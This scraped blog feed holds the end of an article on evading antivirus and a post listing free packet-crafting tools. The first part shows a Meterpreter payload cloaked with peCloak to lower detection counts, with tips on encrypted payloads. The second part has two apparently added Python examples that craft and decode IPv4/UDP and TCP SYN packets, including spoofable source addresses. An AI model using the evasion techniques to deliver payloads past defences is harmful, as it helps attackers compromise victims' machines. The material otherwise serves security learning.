<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
These payloads also work fine when they are executed on the victim’s machine.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The following figure shows a Meterpreter shell obtained using the payload created above.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv15.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Try other payloads that use encryption for better results.</div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
peCloak</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
peCloak is another interesting tool that I came across at the following link.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<a href="http://www.securitysift.com/pecloak-py-an-experiment-in-av-evasion/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;" target="_blank">http://www.securitysift.com/pecloak-py-an-experiment-in-av-evasion/</a></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
This script automates several tricks to evade AVs. The author wrote it for his own purposes and released it publicly as a beta version. It gives us an idea of how we can write our own scripts to evade antivirus products.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Let’s see this in action.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
I am going to create a meterpreter payload using msfvenom for this purpose. This is shown below.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv16.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Let us scan the payload “test.exe” through virustotal.com as shown below.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv17.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
36 out of 56 antivirus engines have flagged this as malicious.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Now, let’s run this through the peCloak.py script.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
I am using the script with the default options as shown below.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv18.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv19.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
It creates a file called “cloaked.exe” as shown in the figure above.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Let’s scan this new payload and see how many antivirus engines detect it as malicious.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv20.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Only 26 out of 56 have flagged it as malicious.</div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
Conclusion:</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Apart from the tools mentioned in this article, there are other options out there, such as Metasploit’s encoders. Custom payloads that are kept simple are more likely to stay clear of antivirus detection than payloads generated by popular frameworks. A side note: the results shown in this article may differ by the time you read it, as antivirus signatures are constantly updated.</div>
<br /></div>
Anonymous (http://www.blogger.com/profile/14161834164641471363), 2016-01-07: 15 Best Free Packet Crafting Tools<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Packet crafting is the process of manually creating new data packets, or editing existing ones, on a network in order to test network devices. Hackers and network admins use this process to test a network, check firewall rules, find entry points and test how network devices behave.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Network data packets carry various pieces of information, including the data itself, the source address, the destination address, the version, the length, the protocol, and a few other fields depending on the protocol. In packet crafting, one either creates a completely new packet or edits an existing packet to change the information it contains. The packet is then sent onto the network to observe the response of the network firewall. By changing values in the packet, attackers try to find an entry point into the network.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
I also want to point out that “packet crafting” and “packet spoofing” are not the same thing.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Packet crafting is not a simple task for beginners. It consists of the following steps:</div>
<ol style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin: 0px 1.5em 1.5em; padding: 0px; vertical-align: baseline;">
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Packet Assembly: </span>Creating a new network packet, or capturing a packet going over the wire and editing its fields as required.</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Packet Editing:</span> Editing the content of an existing packet.</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Packet Re/Play:</span> Sending or resending a packet on the network.</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Packet decoding: </span>Decoding and analyzing the content of the packet.</li>
</ol>
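To make the assembly, editing and decoding steps concrete before turning to the tools, here is an added example written for this post (not code from the article or from any tool it lists): an IPv4/UDP packet built, edited and parsed back in memory with the Python standard library, so the header layout and the checksum arithmetic are visible. Nothing is sent on the wire; the addresses and ports are constructed values.

```python
"""Assemble, edit and decode an IPv4/UDP packet with the standard library only.

Added example for this post, not code from the article or from any listed tool.
Packets are only built and parsed in memory, never sent.
"""
import socket
import struct
from dataclasses import dataclass

UDP_PROTO = 17


def internet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum. Run over data that already carries a
    valid checksum field, it returns 0, which is how the decoder verifies it."""
    if len(data) % 2:
        data += b"\0"  # odd length is zero-padded for the sum only
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:  # fold carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def udp_pseudo_header(src: bytes, dst: bytes, udp_len: int) -> bytes:
    """Pseudo-header that the UDP checksum covers in addition to the datagram."""
    return src + dst + struct.pack("!BBH", 0, UDP_PROTO, udp_len)


@dataclass
class Ipv4Udp:
    src: str
    dst: str
    sport: int
    dport: int
    payload: bytes
    ttl: int = 64
    ident: int = 0x1234

    def assemble(self) -> bytes:
        """Packet Assembly: IPv4 header (no options) + UDP header + payload, checksums filled."""
        src, dst = socket.inet_aton(self.src), socket.inet_aton(self.dst)
        udp_len = 8 + len(self.payload)
        udp_hdr = struct.pack("!HHHH", self.sport, self.dport, udp_len, 0)
        udp_csum = internet_checksum(udp_pseudo_header(src, dst, udp_len) + udp_hdr + self.payload)
        # A computed checksum of 0 is transmitted as 0xFFFF, since 0 means "no checksum".
        udp = struct.pack("!HHHH", self.sport, self.dport, udp_len, udp_csum or 0xFFFF) + self.payload
        ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), self.ident,
                             0x4000, self.ttl, UDP_PROTO, 0, src, dst)  # 0x4000 = DF flag
        ip_hdr = ip_hdr[:10] + struct.pack("!H", internet_checksum(ip_hdr)) + ip_hdr[12:]
        return ip_hdr + udp

    @classmethod
    def decode(cls, pkt: bytes) -> "Ipv4Udp":
        """Packet decoding: parse the headers back and verify both checksums."""
        if len(pkt) < 20 or pkt[0] >> 4 != 4:
            raise ValueError("not an IPv4 packet")
        ihl = (pkt[0] & 0x0F) * 4
        if ihl < 20 or len(pkt) < ihl + 8:
            raise ValueError("truncated packet")
        if internet_checksum(pkt[:ihl]) != 0:
            raise ValueError("bad IPv4 header checksum")
        _, _, total_len, ident, _, ttl, proto, _, src, dst = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
        if proto != UDP_PROTO:
            raise ValueError(f"protocol {proto} is not UDP")
        udp = pkt[ihl:total_len]
        sport, dport, udp_len, udp_csum = struct.unpack("!HHHH", udp[:8])
        if udp_len != len(udp):
            raise ValueError("UDP length field disagrees with the IPv4 total length")
        if udp_csum and internet_checksum(udp_pseudo_header(src, dst, udp_len) + udp) != 0:
            raise ValueError("bad UDP checksum")
        return cls(socket.inet_ntoa(src), socket.inet_ntoa(dst), sport, dport, udp[8:], ttl, ident)


def edit_ttl(pkt: bytes, new_ttl: int) -> bytes:
    """Packet Editing: rewrite the TTL of a raw packet and refresh the IPv4 checksum.
    The UDP checksum is left alone because TTL is not part of the pseudo-header."""
    ihl = (pkt[0] & 0x0F) * 4
    hdr = bytearray(pkt[:ihl])
    hdr[8] = new_ttl          # TTL is byte 8 of the IPv4 header
    hdr[10:12] = b"\0\0"      # zero the checksum field before recomputing it
    hdr[10:12] = struct.pack("!H", internet_checksum(bytes(hdr)))
    return bytes(hdr) + pkt[ihl:]


if __name__ == "__main__":
    original = Ipv4Udp("192.0.2.10", "192.0.2.20", 40000, 53, b"hello").assemble()
    print("assembled:", original.hex())
    print("decoded:  ", Ipv4Udp.decode(original))
    print("ttl=1:    ", Ipv4Udp.decode(edit_ttl(original, 1)).ttl)
```

The decoder refuses a packet whose payload was altered without its checksum being fixed, which is exactly the mistake a hand-edited packet tends to contain and the reason crafting tools recompute checksums for you.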
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Tools are available for all of these steps. In this post, I will write about tools used in these steps. Some tools are step-specific, while others can perform all of the steps. You can try a few or all of the tools listed to see how they work.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
I also recommend reading our existing article on packet crafting. In that article, we have explained packet crafting in detail, with an explanation of all four steps involved, and have shown how to use a few packet crafting tools. That article will help you understand packet crafting and the usage of those tools. Once you understand it clearly, you can read this article to see the available packet crafting tools. Some tools are very old but still work fine. Others are actively developed, while still others are no longer maintained.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
I also recommend learning about network packets, the packet structure of different protocols, and the network layers. If you do not know these things, you will not be able to understand how to do packet crafting or how these tools work. For learning purposes, you must understand the basics of networking before proceeding with this list of tools. You must know about the data packets of different protocols, the different fields in those packets, the meaning or purpose of those fields, and how the packets are used in network communication. Once you know these things, you will be able to change those values to see the desired effect on the network. So, do not try these tools without learning the skills mentioned above; you will end up wasting your time and effort.<br />
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
These are the 15 best free packet crafting tools.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">1. Hping</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Hping is one of the most popular free packet crafting tools. It lets you assemble and send custom ICMP, UDP, TCP and raw IP packets from the command line, with control over individual header fields such as TCP flags, TTL, window size and the source address. Network admins and pentesters use it for security auditing and for testing firewalls and networks. The Nmap project ships a similar packet generator, Nping, that covers much of the same ground.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Hping is available for a wide range of platforms, including Windows, Mac OS X, Linux, FreeBSD, NetBSD, OpenBSD and Solaris.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download Hping: <a href="http://www.hping.org/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://www.hping.org/</span></a></div>
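<div>To make concrete what a tool like hping does when you ask it for a SYN, here is an added example; it is not code from the original article or from the hping project. It assembles an IPv4/TCP SYN packet by hand in plain Python, computing the IP header checksum and the TCP checksum over its pseudo-header (the two values a receiving stack or IDS verifies), then decodes the packet back and re-checks them. The addresses and ports are made-up sample values; `send_raw` shows the raw-socket call that would put the packet on the wire, but it is not invoked.</div>

```python
import socket
import struct


def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum; over a header with a valid checksum it returns 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                        # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4_header(src: str, dst: str, payload_len: int, proto: int = 6,
                      ttl: int = 64, ident: int = 0x1234) -> bytes:
    """20-byte IPv4 header, no options, DF set. src is whatever we claim it is (spoofable)."""
    hdr = struct.pack("!BBHHHBBH4s4s",
                      0x45, 0, 20 + payload_len, ident, 0x4000, ttl, proto,
                      0, socket.inet_aton(src), socket.inet_aton(dst))
    return hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]


def build_tcp_syn(src: str, dst: str, sport: int, dport: int,
                  seq: int = 0x1000, window: int = 512) -> bytes:
    """20-byte TCP header with only SYN set; the checksum covers a pseudo-header holding both IPs."""
    hdr = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x02, window, 0, 0)
    pseudo = struct.pack("!4s4sBBH", socket.inet_aton(src), socket.inet_aton(dst),
                         0, 6, len(hdr))
    return hdr[:16] + struct.pack("!H", checksum(pseudo + hdr)) + hdr[18:]


def craft_syn(src: str, dst: str, sport: int, dport: int) -> bytes:
    """Complete IPv4/TCP SYN, ready for a raw socket."""
    tcp = build_tcp_syn(src, dst, sport, dport)
    return build_ipv4_header(src, dst, len(tcp)) + tcp


def decode(packet: bytes) -> dict:
    """Parse an IPv4/TCP packet and verify both checksums, as a receiver or an IDS would."""
    (ver_ihl, _tos, total_len, _ident, _ff, ttl, proto, _csum,
     src, dst) = struct.unpack("!BBHHHBBH4s4s", packet[:20])
    ihl = (ver_ihl & 0x0F) * 4
    segment = packet[ihl:total_len]
    sport, dport, seq, _ack, _off, flags, _win, _tcsum, _urg = struct.unpack("!HHIIBBHHH", segment[:20])
    pseudo = struct.pack("!4s4sBBH", src, dst, 0, proto, len(segment))
    return {
        "src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst), "ttl": ttl, "proto": proto,
        "sport": sport, "dport": dport, "seq": seq,
        "syn": bool(flags & 0x02), "ack": bool(flags & 0x10),
        "ip_checksum_ok": checksum(packet[:ihl]) == 0,
        "tcp_checksum_ok": checksum(pseudo + segment) == 0,
    }


def send_raw(packet: bytes, dst: str) -> None:
    """Put the packet on the wire. Needs root / CAP_NET_RAW; not called in this example."""
    with socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) as s:
        s.sendto(packet, (dst, 0))


if __name__ == "__main__":
    pkt = craft_syn("10.0.0.1", "10.0.0.2", 40000, 80)   # constructed sample addresses
    print(pkt.hex())
    print(decode(pkt))
```

<div>The same packet from the command line is <code>hping3 -S -p 80 -s 40000 -a 10.0.0.1 -c 1 10.0.0.2</code>, and in Scapy <code>IP(src="10.0.0.1", dst="10.0.0.2")/TCP(sport=40000, dport=80, flags="S")</code>. Both tools fill in the checksums for you, which is exactly the step that goes wrong when you hand-edit a field and forget to recompute: flip one byte of the TTL in the packet above and <code>decode()</code> reports the IP checksum as bad while the TCP checksum, which does not cover the TTL, stays valid.</div>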
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">2. Ostinato</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Ostinato is an open source, cross-platform network packet generator and analyzer. Its GUI makes it easy to use and understand. It supports Windows, Linux, BSD and Mac OS X, and you can also try building it on other platforms.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The best thing about the tool is that it supports most of the common standard protocols. The supported protocols are listed below:</div>
<ul style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin: 0px 1.5em 1.5em 72pt; padding: 0px; vertical-align: baseline;">
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Ethernet/802.3/LLC SNAP</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">VLAN (with QinQ)</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">ARP, IPv4, IPv6, IP-in-IP a.k.a IP Tunnelling (6over4, 4over6, 4over4, 6over6)</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">TCP, UDP, ICMPv4, ICMPv6, IGMP, MLD</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Any text based protocol (HTTP, SIP, RTSP, NNTP etc.)</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Support for more protocols is in the works.</li>
</ul>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
With Ostinato you can modify any field of any supported protocol. It is often described as a complement to Wireshark: Wireshark captures and decodes traffic, Ostinato generates it.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download Ostinato: <a href="http://ostinato.org/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://ostinato.org/</span></a></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">3. Scapy</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Scapy is another good interactive packet crafting tool, written in Python. It can decode or forge packets for a wide range of protocols, and because it is a library as well as an interactive shell, everything you do in it can be scripted. That makes Scapy well worth trying. You can use it for scanning, tracerouting, probing, unit tests, attacks and network discovery.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download Scapy: <a href="http://www.secdev.org/projects/scapy/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://www.secdev.org/projects/scapy/</span></a></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">4. Libcrafter</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Libcrafter is very similar to Scapy. It is a C++ library that makes it easier to create and decode network packets. It can build and decode packets for most common protocols, capture packets, and match requests with their replies. The library was designed to be multithreaded, so you can perform several tasks simultaneously.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download Libcrafter: <a href="https://code.google.com/p/libcrafter/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">https://code.google.com/p/libcrafter/</span></a></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">5. Yersinia</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Yersinia is a powerful network penetration-testing tool built around attacks on Layer 2 protocols: it implements attacks against STP, CDP, DTP, DHCP, HSRP, 802.1Q, 802.1X, ISL and VTP. If you are looking for packet crafting tools for switched networks, this is a good one to have.</div>
